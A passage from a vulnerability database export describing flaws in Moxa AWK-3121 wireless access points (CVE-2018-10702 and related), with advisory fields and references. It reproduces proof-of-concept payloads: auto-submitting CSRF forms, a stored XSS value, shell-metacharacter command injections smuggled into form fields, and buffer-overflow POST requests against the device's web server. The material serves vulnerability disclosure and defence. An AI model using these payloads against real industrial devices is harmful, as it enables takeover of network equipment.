https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"db": "VULHUB",
"id": "VHN-120488"
},
{
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10702",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-330",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120488",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10702",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120488"
},
{
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10702"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
]
},
"id": "VAR-201906-0792",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120488"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.744000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.moxa.com/en/"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120488"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"db": "NVD",
"id": "CVE-2018-10702"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10702"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120488"
},
{
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10702"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120488"
},
{
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10702"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120488"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.763000",
"db": "NVD",
"id": "CVE-2018-10702"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-120488"
},
{
"date": "2023-02-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"date": "2023-02-28T19:29:39.187000",
"db": "NVD",
"id": "CVE-2018-10702"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
],
"trust": 0.6
}
}
VAR-201906-0784
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. There is a cryptographic vulnerability in the MoxaAWK-31211.14 release. The vulnerability stems from the network system or product not using the relevant cryptographic algorithm correctly, resulting in content not being properly encrypted, weakly encrypted, and plaintext storage sensitive information. A trust management issue vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization.
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. However, the same functionality allows an attacker to execute commands on the device. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection.
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters.
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0784",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 2.4,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "CNVD",
